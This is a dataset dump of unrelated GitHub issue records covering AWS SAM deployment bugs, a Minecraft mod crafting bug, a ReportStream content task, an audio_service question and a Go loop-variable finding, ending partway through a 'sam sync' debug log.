Updating API resource policy using mappings - I recently ran into an issue where resource policy on my API was getting updated but was not effective. So essentially a new deployment was not being created by SAM. It's because SAM processes the template before any mapping substitutions and according to SAM nothing changed and it doesn't generate a deployment. However, cloud-formation does the substitutions and updates the API. So you see updated policy in the console but its not effective. **Steps to reproduce the issue:** ```yaml Resources: LambdaAPIDefinition: Type: 'AWS::Serverless::Api' Properties: StageName: {Ref: Stage} DefinitionBody: REPLACE_WITH_SWAGGER_DEFINITION Auth: DefaultAuthorizer: AWS_IAM ResourcePolicy: CustomStatements: - Effect: Allow Principal: AWS: { 'Fn::FindInMap': [Map1, Map2, ReadOnlyApiAccounts] } Action: "execute-api:Invoke" Resource: - {'Fn::Sub': 'arn:${AWS::Partition}:execute-api:${AWS::Region}:${AWS::AccountId}:*'} Mappings: Map1: Map2: ReadOnlyApiAccounts : ["1234567890"] AllApiAccounts: ["1234567890"] ``` When i change ReadOnlyApiAccounts, i expect SAM to generate an API Deployment for policy changes to take effect but it doesn't.
main
updating api resource policy using mappings i recently ran into an issue where resource policy on my api was getting updated but was not effective so essentially a new deployment was not being created by sam it s because sam processes the template before any mapping substitutions and according to sam nothing changed and it doesn t generate a deployment however cloud formation does the substitutions and updates the api so you see updated policy in the console but its not effective steps to reproduce the issue yaml resources lambdaapidefinition type aws serverless api properties stagename ref stage definitionbody replace with swagger definition auth defaultauthorizer aws iam resourcepolicy customstatements effect allow principal aws fn findinmap action execute api invoke resource fn sub arn aws partition execute api aws region aws accountid mappings readonlyapiaccounts allapiaccounts when i change readonlyapiaccounts i expect sam to generate an api deployment for policy changes to take effect but it doesn t
1
3,918
17,576,116,556
IssuesEvent
2021-08-15 16:38:37
jesus2099/konami-command
https://api.github.com/repos/jesus2099/konami-command
closed
TAG_TOOLS might now be redundant?
invalid mb_SUPER-MIND-CONTROL-II-X-TURBO minor maintainability
It seems now tag pages contain links to my/other tags: https://musicbrainz.org/user/jesus2099/tag/(cu)cumbersome Check if other TAG_TOOLS features are also in MBS now.
True
TAG_TOOLS might now be redundant? - It seems now tag pages contain links to my/other tags: https://musicbrainz.org/user/jesus2099/tag/(cu)cumbersome Check if other TAG_TOOLS features are also in MBS now.
main
tag tools might now be redundant it seems now tag pages contain links to my other tags check if other tag tools features are also in mbs now
1
3,230
12,368,706,266
IssuesEvent
2020-05-18 14:13:29
Kashdeya/Tiny-Progressions
https://api.github.com/repos/Kashdeya/Tiny-Progressions
closed
Can't craft flint tools or weapon - just become stone items
Version not Maintainted cant duplicate
Crafting with flint of any tools or weapon results in a stone tool or weapon
True
Can't craft flint tools or weapon - just become stone items - Crafting with flint of any tools or weapon results in a stone tool or weapon
main
can t craft flint tools or weapon just become stone items crafting with flint of any tools or weapon results in a stone tool or weapon
1
181,820
30,747,030,488
IssuesEvent
2023-07-28 15:48:35
CDCgov/prime-reportstream
https://api.github.com/repos/CDCgov/prime-reportstream
opened
Content update: Release notes
design experience
## User story As a ReportStream prospective/current user, I want the website content to be up-to-date, accurate and timely so I can trust the information to inform my decisions in my relationship with ReportStream. ## Background & context After completing basic outlines for key pages and IDing the new site structure, we need to create the actual content that will go in the wireframes. This ticket captures the work of updating the content for the **Release notes**. ## Open questions N/A ## Working links - TK: Draft link ## Acceptance criteria - [ ] Drafted finalized and reviewed with content owner and/or SME - [ ] Final draft presented to designer for next steps - [ ] Capture questions that come up during the content and design work in the [Website redesign research plan](https://docs.google.com/document/d/1Hmxu_mTGvSJ0RnfS_SXoY84dBeAyUuy7KsCL08N0azg/edit#heading=h.sqsn2oxgx0ou)
1.0
Content update: Release notes - ## User story As a ReportStream prospective/current user, I want the website content to be up-to-date, accurate and timely so I can trust the information to inform my decisions in my relationship with ReportStream. ## Background & context After completing basic outlines for key pages and IDing the new site structure, we need to create the actual content that will go in the wireframes. This ticket captures the work of updating the content for the **Release notes**. ## Open questions N/A ## Working links - TK: Draft link ## Acceptance criteria - [ ] Drafted finalized and reviewed with content owner and/or SME - [ ] Final draft presented to designer for next steps - [ ] Capture questions that come up during the content and design work in the [Website redesign research plan](https://docs.google.com/document/d/1Hmxu_mTGvSJ0RnfS_SXoY84dBeAyUuy7KsCL08N0azg/edit#heading=h.sqsn2oxgx0ou)
non_main
content update release notes user story as a reportstream prospective current user i want the website content to be up to date accurate and timely so i can trust the information to inform my decisions in my relationship with reportstream background context after completing basic outlines for key pages and iding the new site structure we need to create the actual content that will go in the wireframes this ticket captures the work of updating the content for the release notes open questions n a working links tk draft link acceptance criteria drafted finalized and reviewed with content owner and or sme final draft presented to designer for next steps capture questions that come up during the content and design work in the
0
160,986
13,804,622,012
IssuesEvent
2020-10-11 09:53:27
ryanheise/audio_service
https://api.github.com/repos/ryanheise/audio_service
closed
How to check that the service has started/is running before attempting to communicate with it?
1 backlog Awaiting response documentation
### Question Is there a specific way of checking that the service is running, and that the BackgroundAudioTask constructor has finished execution; so that I can guarantee the ChangeNotifier will successfully retrieve the registered port? ### Context I am attempting to set up communication to the audio_service background task via Send and Receive Ports, using the IsolateNameServer to register and look up the port to use. If I start the service as soon as the app launches it will start, register the port and then the awaited Boolean result of starting the service will return and the main thread (in a ChangeNotifier) will successfully to look up and retrieve the registered port. However, this behaviour is not ideal as it means the notification is sitting empty as I'm not trying to play any audio (no media item set) as soon as the app loads. Alternatively if I wait until the first time I want to play some audio to start the service, then the service starts and successfully registers the port. But the ChangeNotifier that started the service cannot retrieve the port from the IsolateNameServer. I am guessing here, but I think this is due to the service either still being in the process of starting, or the BackgroundAudioTask not being fully initialized before attempting to fetch the registered port.
1.0
How to check that the service has started/is running before attempting to communicate with it? - ### Question Is there a specific way of checking that the service is running, and that the BackgroundAudioTask constructor has finished execution; so that I can guarantee the ChangeNotifier will successfully retrieve the registered port? ### Context I am attempting to set up communication to the audio_service background task via Send and Receive Ports, using the IsolateNameServer to register and look up the port to use. If I start the service as soon as the app launches it will start, register the port and then the awaited Boolean result of starting the service will return and the main thread (in a ChangeNotifier) will successfully to look up and retrieve the registered port. However, this behaviour is not ideal as it means the notification is sitting empty as I'm not trying to play any audio (no media item set) as soon as the app loads. Alternatively if I wait until the first time I want to play some audio to start the service, then the service starts and successfully registers the port. But the ChangeNotifier that started the service cannot retrieve the port from the IsolateNameServer. I am guessing here, but I think this is due to the service either still being in the process of starting, or the BackgroundAudioTask not being fully initialized before attempting to fetch the registered port.
non_main
how to check that the service has started is running before attempting to communicate with it question is there a specific way of checking that the service is running and that the backgroundaudiotask constructor has finished execution so that i can guarantee the changenotifier will successfully retrieve the registered port context i am attempting to set up communication to the audio service background task via send and receive ports using the isolatenameserver to register and look up the port to use if i start the service as soon as the app launches it will start register the port and then the awaited boolean result of starting the service will return and the main thread in a changenotifier will successfully to look up and retrieve the registered port however this behaviour is not ideal as it means the notification is sitting empty as i m not trying to play any audio no media item set as soon as the app loads alternatively if i wait until the first time i want to play some audio to start the service then the service starts and successfully registers the port but the changenotifier that started the service cannot retrieve the port from the isolatenameserver i am guessing here but i think this is due to the service either still being in the process of starting or the backgroundaudiotask not being fully initialized before attempting to fetch the registered port
0
197,026
15,618,719,705
IssuesEvent
2021-03-20 01:55:34
mossmann/hackrf
https://api.github.com/repos/mossmann/hackrf
closed
need technical specifications
documentation question
Missing specifications: - speed of panoramic analysis; - the number of monitored channels; - the minimum duration of the detected radio signal;
1.0
need technical specifications - Missing specifications: - speed of panoramic analysis; - the number of monitored channels; - the minimum duration of the detected radio signal;
non_main
need technical specifications missing specifications speed of panoramic analysis the number of monitored channels the minimum duration of the detected radio signal
0
186,127
14,394,638,319
IssuesEvent
2020-12-03 01:46:13
github-vet/rangeclosure-findings
https://api.github.com/repos/github-vet/rangeclosure-findings
closed
pingcap/tidb-operator: pkg/backup/backupschedule/backup_schedule_manager_test.go; 12 LoC
fresh small test
Found a possible issue in [pingcap/tidb-operator](https://www.github.com/pingcap/tidb-operator) at [pkg/backup/backupschedule/backup_schedule_manager_test.go](https://github.com/pingcap/tidb-operator/blob/57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69/pkg/backup/backupschedule/backup_schedule_manager_test.go#L97-L108) Below is the message reported by the analyzer for this snippet of code. Beware that the analyzer only reports the first issue it finds, so please do not limit your consideration to the contents of the below message. > function call which takes a reference to bk at line 105 may start a goroutine [Click here to see the code in its original context.](https://github.com/pingcap/tidb-operator/blob/57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69/pkg/backup/backupschedule/backup_schedule_manager_test.go#L97-L108) <details> <summary>Click here to show the 12 line(s) of Go which triggered the analyzer.</summary> ```go for _, bk := range bks.Items { changed := v1alpha1.UpdateBackupCondition(&bk.Status, &v1alpha1.BackupCondition{ Type: v1alpha1.BackupComplete, Status: v1.ConditionTrue, }) if changed { bk.CreationTimestamp = metav1.Time{Time: m.now()} t.Log("complete backup: ", bk.Name) helper.updateBackup(&bk) } g.Expect(err).Should(BeNil()) } ``` </details> Leave a reaction on this issue to contribute to the project by classifying this instance as a **Bug** :-1:, **Mitigated** :+1:, or **Desirable Behavior** :rocket: See the descriptions of the classifications [here](https://github.com/github-vet/rangeclosure-findings#how-can-i-help) for more information. commit ID: 57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69
1.0
pingcap/tidb-operator: pkg/backup/backupschedule/backup_schedule_manager_test.go; 12 LoC - Found a possible issue in [pingcap/tidb-operator](https://www.github.com/pingcap/tidb-operator) at [pkg/backup/backupschedule/backup_schedule_manager_test.go](https://github.com/pingcap/tidb-operator/blob/57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69/pkg/backup/backupschedule/backup_schedule_manager_test.go#L97-L108) Below is the message reported by the analyzer for this snippet of code. Beware that the analyzer only reports the first issue it finds, so please do not limit your consideration to the contents of the below message. > function call which takes a reference to bk at line 105 may start a goroutine [Click here to see the code in its original context.](https://github.com/pingcap/tidb-operator/blob/57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69/pkg/backup/backupschedule/backup_schedule_manager_test.go#L97-L108) <details> <summary>Click here to show the 12 line(s) of Go which triggered the analyzer.</summary> ```go for _, bk := range bks.Items { changed := v1alpha1.UpdateBackupCondition(&bk.Status, &v1alpha1.BackupCondition{ Type: v1alpha1.BackupComplete, Status: v1.ConditionTrue, }) if changed { bk.CreationTimestamp = metav1.Time{Time: m.now()} t.Log("complete backup: ", bk.Name) helper.updateBackup(&bk) } g.Expect(err).Should(BeNil()) } ``` </details> Leave a reaction on this issue to contribute to the project by classifying this instance as a **Bug** :-1:, **Mitigated** :+1:, or **Desirable Behavior** :rocket: See the descriptions of the classifications [here](https://github.com/github-vet/rangeclosure-findings#how-can-i-help) for more information. commit ID: 57b7160e1586cf6f4bd0354fc8c4a7ee750a4f69
non_main
pingcap tidb operator pkg backup backupschedule backup schedule manager test go loc found a possible issue in at below is the message reported by the analyzer for this snippet of code beware that the analyzer only reports the first issue it finds so please do not limit your consideration to the contents of the below message function call which takes a reference to bk at line may start a goroutine click here to show the line s of go which triggered the analyzer go for bk range bks items changed updatebackupcondition bk status backupcondition type backupcomplete status conditiontrue if changed bk creationtimestamp time time m now t log complete backup bk name helper updatebackup bk g expect err should benil leave a reaction on this issue to contribute to the project by classifying this instance as a bug mitigated or desirable behavior rocket see the descriptions of the classifications for more information commit id
0
4,403
22,617,321,211
IssuesEvent
2022-06-30 00:20:29
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
closed
`sam sync` does not support custom bucket names
type/ux type/feature area/sam-config area/sync maintainer/need-followup area/accelerate
### Description: I don't use the default SAM bucket, I have my own. `sam sync` does not seem to support this. ### Steps to reproduce: Do `sam init` and create the zip Python 3.9 "Hello World" template. Create the following samconfig.toml ```toml version = 0.1 [default] [default.deploy] [default.deploy.parameters] stack_name = "sam-test" s3_bucket = "mybucket" s3_prefix = "sam-test" region = "us-west-2" capabilities = "CAPABILITY_IAM" ``` Run `sam build && sam deploy`, which succeeds. ### Observed result: `sam sync --stack-name sam-test` gives the following output. You can see it's attempting to use the default managed SAM bucket. ``` 2021-12-17 11:40:14,807 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2021-12-17 11:40:14,812 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2021-12-17 11:40:14,812 | Sending Telemetry: {'metrics': [{'templateWarning': {'requestId': '5e92f8cb-75e3-4793-81f8-faee808f01a7', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'warningName': 'CodeDeployWarning', 'warningCount': 0}}]} 2021-12-17 11:40:15,017 | Telemetry response: 200 2021-12-17 11:40:15,018 | Sending Telemetry: {'metrics': [{'templateWarning': {'requestId': 'd0f3bfd9-c6d7-40db-9c8b-337bf8efcd98', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'warningName': 'CodeDeployConditionWarning', 'warningCount': 0}}]} 2021-12-17 11:40:15,283 | Telemetry response: 200 2021-12-17 11:40:15,284 | Using config file: samconfig.toml, config environment: default 2021-12-17 11:40:15,284 | Expand command line arguments to: 2021-12-17 11:40:15,284 | --template_file=/Users/luhn/Code/audit/test/template.yaml --stack_name=sam-test --dependency_layer --capabilities=('CAPABILITY_NAMED_IAM', 'CAPABILITY_AUTO_EXPAND') Managed S3 bucket: aws-sam-cli-managed-default-samclisourcebucket-1aupim17uw7m6 Default capabilities applied: ('CAPABILITY_NAMED_IAM', 'CAPABILITY_AUTO_EXPAND') To override with customized capabilities, use --capabilities flag or set it in samconfig.toml 2021-12-17 11:40:16,112 | Using build directory as .aws-sam/auto-dependency-layer 2021-12-17 11:40:16,112 | Using build directory as .aws-sam/auto-dependency-layer This feature is currently in beta. Visit the docs page to learn more about the AWS Beta terms https://aws.amazon.com/service-terms/. The SAM CLI will use the AWS Lambda, Amazon API Gateway, and AWS StepFunctions APIs to upload your code without performing a CloudFormation deployment. This will cause drift in your CloudFormation stack. **The sync command should only be used against a development stack**. Confirm that you are synchronizing a development stack and want to turn on beta features. Enter Y to proceed with the command, or enter N to cancel: [y/N]: 2021-12-17 11:40:17,467 |  Experimental features are enabled for this session. Visit the docs page to learn more about the AWS Beta terms https://aws.amazon.com/service-terms/.  2021-12-17 11:40:17,477 | No Parameters detected in the template 2021-12-17 11:40:17,499 | 2 stacks found in the template 2021-12-17 11:40:17,499 | No Parameters detected in the template 2021-12-17 11:40:17,510 | 2 resources found in the stack 2021-12-17 11:40:17,510 | No Parameters detected in the template 2021-12-17 11:40:17,519 | Found Serverless function with name='HelloWorldFunction' and CodeUri='hello_world/' 2021-12-17 11:40:17,519 | --base-dir is not presented, adjusting uri hello_world/ relative to /Users/luhn/Code/audit/test/template.yaml 2021-12-17 11:40:17,519 | No Parameters detected in the template 2021-12-17 11:40:17,538 | Executing the build using build context. 2021-12-17 11:40:17,538 | Instantiating build definitions 2021-12-17 11:40:17,540 | Same function build definition found, adding function (Previous: BuildDefinition(python3.9, /Users/luhn/Code/audit/test/hello_world, Zip, , d23e058e-cbff-4bce-85b2-09954cf33d29, {}, {}, x86_64, []), Current: BuildDefinition(python3.9, /Users/luhn/Code/audit/test/hello_world, Zip, , 85a07967-200c-4a31-81df-7700103e6ad7, {}, {}, x86_64, []), Function: Function(name='HelloWorldFunction', functionname='HelloWorldFunction', runtime='python3.9', memory=None, timeout=3, handler='app.lambda_handler', imageuri=None, packagetype='Zip', imageconfig=None, codeuri='/Users/luhn/Code/audit/test/hello_world', environment=None, rolearn=None, layers=[], events={'HelloWorld': {'Type': 'Api', 'Properties': {'Path': '/hello', 'Method': 'get', 'RestApiId': 'ServerlessRestApi'}}}, metadata=None, inlinecode=None, codesign_config_arn=None, architectures=['x86_64'], stack_path='')) 2021-12-17 11:40:17,541 | Async execution started 2021-12-17 11:40:17,541 | Invoking function functools.partial(<bound method CachedOrIncrementalBuildStrategyWrapper.build_single_function_definition of <samcli.lib.build.build_strategy.CachedOrIncrementalBuildStrategyWrapper object at 0x1056eb3d0>>, <samcli.lib.build.build_graph.FunctionBuildDefinition object at 0x1053468e0>) 2021-12-17 11:40:17,541 | Running incremental build for runtime python3.9 for build definition d23e058e-cbff-4bce-85b2-09954cf33d29 2021-12-17 11:40:17,541 | Waiting for async results 2021-12-17 11:40:17,541 | Manifest is not changed for d23e058e-cbff-4bce-85b2-09954cf33d29, running incremental build 2021-12-17 11:40:17,541 | Building codeuri: /Users/luhn/Code/audit/test/hello_world runtime: python3.9 metadata: {} architecture: x86_64 functions: ['HelloWorldFunction'] 2021-12-17 11:40:17,541 | Building to following folder /Users/luhn/Code/audit/test/.aws-sam/auto-dependency-layer/HelloWorldFunction 2021-12-17 11:40:17,542 | Loading workflow module 'aws_lambda_builders.workflows' 2021-12-17 11:40:17,546 | Registering workflow 'PythonPipBuilder' with capability 'Capability(language='python', dependency_manager='pip', application_framework=None)' 2021-12-17 11:40:17,548 | Registering workflow 'NodejsNpmBuilder' with capability 'Capability(language='nodejs', dependency_manager='npm', application_framework=None)' 2021-12-17 11:40:17,549 | Registering workflow 'RubyBundlerBuilder' with capability 'Capability(language='ruby', dependency_manager='bundler', application_framework=None)' 2021-12-17 11:40:17,551 | Registering workflow 'GoDepBuilder' with capability 'Capability(language='go', dependency_manager='dep', application_framework=None)' 2021-12-17 11:40:17,553 | Registering workflow 'GoModulesBuilder' with capability 'Capability(language='go', dependency_manager='modules', application_framework=None)' 2021-12-17 11:40:17,555 | Registering workflow 'JavaGradleWorkflow' with capability 'Capability(language='java', dependency_manager='gradle', application_framework=None)' 2021-12-17 11:40:17,556 | Registering workflow 'JavaMavenWorkflow' with capability 'Capability(language='java', dependency_manager='maven', application_framework=None)' 2021-12-17 11:40:17,558 | Registering workflow 'DotnetCliPackageBuilder' with capability 'Capability(language='dotnet', dependency_manager='cli-package', application_framework=None)' 2021-12-17 11:40:17,559 | Registering workflow 'CustomMakeBuilder' with capability 'Capability(language='provided', dependency_manager=None, application_framework=None)' 2021-12-17 11:40:17,559 | Found workflow 'PythonPipBuilder' to support capabilities 'Capability(language='python', dependency_manager='pip', application_framework=None)' 2021-12-17 11:40:17,626 | Running workflow 'PythonPipBuilder' 2021-12-17 11:40:17,627 | Running PythonPipBuilder:CopySource 2021-12-17 11:40:17,629 | PythonPipBuilder:CopySource succeeded 2021-12-17 11:40:17,629 | Async execution completed 2021-12-17 11:40:17,630 | Auto creating dependency layer for each function resource into a nested stack 2021-12-17 11:40:17,630 | No Parameters detected in the template 2021-12-17 11:40:17,636 | 2 resources found in the stack sam-test 2021-12-17 11:40:17,636 | No Parameters detected in the template 2021-12-17 11:40:17,641 | Found Serverless function with name='HelloWorldFunction' and CodeUri='.aws-sam/auto-dependency-layer/HelloWorldFunction' 2021-12-17 11:40:17,641 | --base-dir is not presented, adjusting uri .aws-sam/auto-dependency-layer/HelloWorldFunction relative to /Users/luhn/Code/audit/test/template.yaml Build Succeeded Built Artifacts : .aws-sam/auto-dependency-layer Built Template : .aws-sam/auto-dependency-layer/template.yaml Commands you can use next ========================= [*] Invoke Function: sam local invoke -t .aws-sam/auto-dependency-layer/template.yaml [*] Test Function in the Cloud: sam sync --stack-name {stack-name} --watch [*] Deploy: sam deploy --guided --template-file .aws-sam/auto-dependency-layer/template.yaml 2021-12-17 11:40:17,667 | Executing the packaging using package context. 2021-12-17 11:40:18,030 | Unable to export Traceback (most recent call last): File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 114, in upload future.result() File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/futures.py", line 106, in result return self._coordinator.result() File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/futures.py", line 265, in result raise self._exception File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/tasks.py", line 126, in __call__ return self._execute_main(kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/tasks.py", line 150, in _execute_main return_value = self._main(**kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/upload.py", line 694, in _main client.put_object(Bucket=bucket, Key=key, Body=body, **extra_args) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/botocore/client.py", line 391, in _api_call return self._make_api_call(operation_name, kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/botocore/client.py", line 719, in _make_api_call raise error_class(parsed_response, operation_name) botocore.errorfactory.NoSuchBucket: An error occurred (NoSuchBucket) when calling the PutObject operation: The specified bucket does not exist The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/packageable_resources.py", line 126, in export self.do_export(resource_id, resource_dict, parent_dir) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/packageable_resources.py", line 148, in do_export uploaded_url = upload_local_artifacts( File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/utils.py", line 171, in upload_local_artifacts return zip_and_upload(local_path, uploader, extension) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/utils.py", line 189, in zip_and_upload return uploader.upload_with_dedup(zip_file, precomputed_md5=md5_hash, extension=extension) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 143, in upload_with_dedup return self.upload(file_name, remote_path) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 121, in upload raise NoSuchBucketError(bucket_name=self.bucket_name) from ex samcli.commands.package.exceptions.NoSuchBucketError: S3 Bucket does not exist. 2021-12-17 11:40:18,033 | Sending Telemetry: {'metrics': [{'commandRunExperimental': {'requestId': '2898b15c-f378-4219-b192-da75e8d8e59d', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'commandName': 'sam sync', 'metricSpecificAttributes': {'experimentalAccelerate': True, 'experimentalAll': False}, 'duration': 3225, 'exitReason': 'ExportFailedError', 'exitCode': 1}}]} 2021-12-17 11:40:18,278 | Telemetry response: 200 Error: Unable to upload artifact HelloWorldFunction referenced by CodeUri parameter of HelloWorldFunction resource. S3 Bucket does not exist. ``` ### Expected result: I would expect a) sync to honor the settings in samconfig.toml or b) a CLI flag to set the S3 bucket name. ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Mac OS Monterey 2. If using SAM CLI, `sam --version`: `SAM CLI, version 1.36.0` 3. AWS region: us-west-2
True
`sam sync` does not support custom bucket names - ### Description: I don't use the default SAM bucket, I have my own. `sam sync` does not seem to support this. ### Steps to reproduce: Do `sam init` and create the zip Python 3.9 "Hello World" template. Create the following samconfig.toml ```toml version = 0.1 [default] [default.deploy] [default.deploy.parameters] stack_name = "sam-test" s3_bucket = "mybucket" s3_prefix = "sam-test" region = "us-west-2" capabilities = "CAPABILITY_IAM" ``` Run `sam build && sam deploy`, which succeeds. ### Observed result: `sam sync --stack-name sam-test` gives the following output. You can see it's attempting to use the default managed SAM bucket. ``` 2021-12-17 11:40:14,807 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2021-12-17 11:40:14,812 | Telemetry endpoint configured to be https://aws-serverless-tools-telemetry.us-west-2.amazonaws.com/metrics 2021-12-17 11:40:14,812 | Sending Telemetry: {'metrics': [{'templateWarning': {'requestId': '5e92f8cb-75e3-4793-81f8-faee808f01a7', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'warningName': 'CodeDeployWarning', 'warningCount': 0}}]} 2021-12-17 11:40:15,017 | Telemetry response: 200 2021-12-17 11:40:15,018 | Sending Telemetry: {'metrics': [{'templateWarning': {'requestId': 'd0f3bfd9-c6d7-40db-9c8b-337bf8efcd98', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'warningName': 'CodeDeployConditionWarning', 'warningCount': 0}}]} 2021-12-17 11:40:15,283 | Telemetry response: 200 2021-12-17 11:40:15,284 | Using config file: samconfig.toml, config environment: default 2021-12-17 11:40:15,284 | Expand command line arguments to: 2021-12-17 11:40:15,284 | --template_file=/Users/luhn/Code/audit/test/template.yaml --stack_name=sam-test --dependency_layer --capabilities=('CAPABILITY_NAMED_IAM', 'CAPABILITY_AUTO_EXPAND') Managed S3 bucket: aws-sam-cli-managed-default-samclisourcebucket-1aupim17uw7m6 Default capabilities applied: ('CAPABILITY_NAMED_IAM', 'CAPABILITY_AUTO_EXPAND') To override with customized capabilities, use --capabilities flag or set it in samconfig.toml 2021-12-17 11:40:16,112 | Using build directory as .aws-sam/auto-dependency-layer 2021-12-17 11:40:16,112 | Using build directory as .aws-sam/auto-dependency-layer This feature is currently in beta. Visit the docs page to learn more about the AWS Beta terms https://aws.amazon.com/service-terms/. The SAM CLI will use the AWS Lambda, Amazon API Gateway, and AWS StepFunctions APIs to upload your code without performing a CloudFormation deployment. This will cause drift in your CloudFormation stack. **The sync command should only be used against a development stack**. Confirm that you are synchronizing a development stack and want to turn on beta features. Enter Y to proceed with the command, or enter N to cancel: [y/N]: 2021-12-17 11:40:17,467 |  Experimental features are enabled for this session. Visit the docs page to learn more about the AWS Beta terms https://aws.amazon.com/service-terms/.  2021-12-17 11:40:17,477 | No Parameters detected in the template 2021-12-17 11:40:17,499 | 2 stacks found in the template 2021-12-17 11:40:17,499 | No Parameters detected in the template 2021-12-17 11:40:17,510 | 2 resources found in the stack 2021-12-17 11:40:17,510 | No Parameters detected in the template 2021-12-17 11:40:17,519 | Found Serverless function with name='HelloWorldFunction' and CodeUri='hello_world/' 2021-12-17 11:40:17,519 | --base-dir is not presented, adjusting uri hello_world/ relative to /Users/luhn/Code/audit/test/template.yaml 2021-12-17 11:40:17,519 | No Parameters detected in the template 2021-12-17 11:40:17,538 | Executing the build using build context. 2021-12-17 11:40:17,538 | Instantiating build definitions 2021-12-17 11:40:17,540 | Same function build definition found, adding function (Previous: BuildDefinition(python3.9, /Users/luhn/Code/audit/test/hello_world, Zip, , d23e058e-cbff-4bce-85b2-09954cf33d29, {}, {}, x86_64, []), Current: BuildDefinition(python3.9, /Users/luhn/Code/audit/test/hello_world, Zip, , 85a07967-200c-4a31-81df-7700103e6ad7, {}, {}, x86_64, []), Function: Function(name='HelloWorldFunction', functionname='HelloWorldFunction', runtime='python3.9', memory=None, timeout=3, handler='app.lambda_handler', imageuri=None, packagetype='Zip', imageconfig=None, codeuri='/Users/luhn/Code/audit/test/hello_world', environment=None, rolearn=None, layers=[], events={'HelloWorld': {'Type': 'Api', 'Properties': {'Path': '/hello', 'Method': 'get', 'RestApiId': 'ServerlessRestApi'}}}, metadata=None, inlinecode=None, codesign_config_arn=None, architectures=['x86_64'], stack_path='')) 2021-12-17 11:40:17,541 | Async execution started 2021-12-17 11:40:17,541 | Invoking function functools.partial(<bound method CachedOrIncrementalBuildStrategyWrapper.build_single_function_definition of <samcli.lib.build.build_strategy.CachedOrIncrementalBuildStrategyWrapper object at 0x1056eb3d0>>, <samcli.lib.build.build_graph.FunctionBuildDefinition object at 0x1053468e0>) 2021-12-17 11:40:17,541 | Running incremental build for runtime python3.9 for build definition d23e058e-cbff-4bce-85b2-09954cf33d29 2021-12-17 11:40:17,541 | Waiting for async results 2021-12-17 11:40:17,541 | Manifest is not changed for d23e058e-cbff-4bce-85b2-09954cf33d29, running incremental build 2021-12-17 11:40:17,541 | Building codeuri: /Users/luhn/Code/audit/test/hello_world runtime: python3.9 metadata: {} architecture: x86_64 functions: ['HelloWorldFunction'] 2021-12-17 11:40:17,541 | Building to following folder /Users/luhn/Code/audit/test/.aws-sam/auto-dependency-layer/HelloWorldFunction 2021-12-17 11:40:17,542 | Loading workflow module 'aws_lambda_builders.workflows' 2021-12-17 11:40:17,546 | Registering workflow 'PythonPipBuilder' with capability 'Capability(language='python', dependency_manager='pip', application_framework=None)' 2021-12-17 11:40:17,548 | Registering workflow 'NodejsNpmBuilder' with capability 'Capability(language='nodejs', dependency_manager='npm', application_framework=None)' 2021-12-17 11:40:17,549 | Registering workflow 'RubyBundlerBuilder' with capability 'Capability(language='ruby', dependency_manager='bundler', application_framework=None)' 2021-12-17 